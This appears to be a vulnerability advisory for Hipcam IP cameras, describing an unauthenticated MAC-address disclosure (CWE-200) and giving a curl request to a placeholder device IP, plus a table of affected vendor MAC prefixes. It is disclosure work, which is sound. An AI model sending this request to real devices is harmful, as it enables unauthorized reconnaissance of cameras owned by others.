The Hipcam device is vulnerable to unauthorized access, allowing an attacker to retrieve the MAC address of the device without proper authentication or authorization. By sending a specific HTTP request to the device, an attacker can obtain sensitive information about the device, which could be used for further exploitation or unauthorized access.
This vulnerability poses a moderate risk to the security of the Hipcam device and its users. Although the MAC address alone may not directly compromise the device or its network, it can be used as part of a reconnaissance phase in a larger attack. Furthermore, unauthorized access to device information undermines the confidentiality and integrity of the device's data, affecting over 722,000 devices on the Internet.
CWE-200: Information Exposure
Launch an HTTP GET request to the target device:
curl http://<DEVICE_IP_ADDR>/log/wifi.mac
Upon successful exploitation, the response will contain the MAC address of the device without requiring any form of authentication or authorization.
| MAC address | Organization | Country/Region | Address |
|---|---|---|---|
| 00:0c:43:e0:: | Ralink Technology, Corp. | TW, China | 4F, No.2, Technology 5th Road, Hsin-Chu 200 |
| 00:0c:43:b1:: | Ralink Technology, Corp. | TW, China | 4F, No.2, Technology 5th Road, Hsin-Chu 200 |
| 20:32:33:0d:: | SHENZHEN BILIAN ELECTRONIC CO.,LTD | CN | NO.268, Fuqian Rd, Jutang community, Guanlan Town, Longhua New district shenzhen guangdong 518000 |
| 20:32:33:17:: | SHENZHEN BILIAN ELECTRONIC CO.,LTD | CN | NO.268, Fuqian Rd, Jutang community, Guanlan Town, Longhua New district shenzhen guangdong 518000 |
| 00:7e:56:73:: | China Dragon Technology Limited | CN | B4 Bldg.Haoshan 1st Industry Park, Shenzhen Guangdong 518104 |
| 00:0e:00:02:: | Atrie | TW, China | 10th Floor, 14, Lane 609, Sec. 5, Chung Hsin Rd., San Chung City, Taipei Hsien San Chung 241 |
| 08:ea:40:9b:: | SHENZHEN BILIAN ELECTRONIC CO.,LTD | CN | NO.268, Fuqian Rd, Jutang community, Guanlan Town, Longhua New district shenzhen guangdong 518000 |
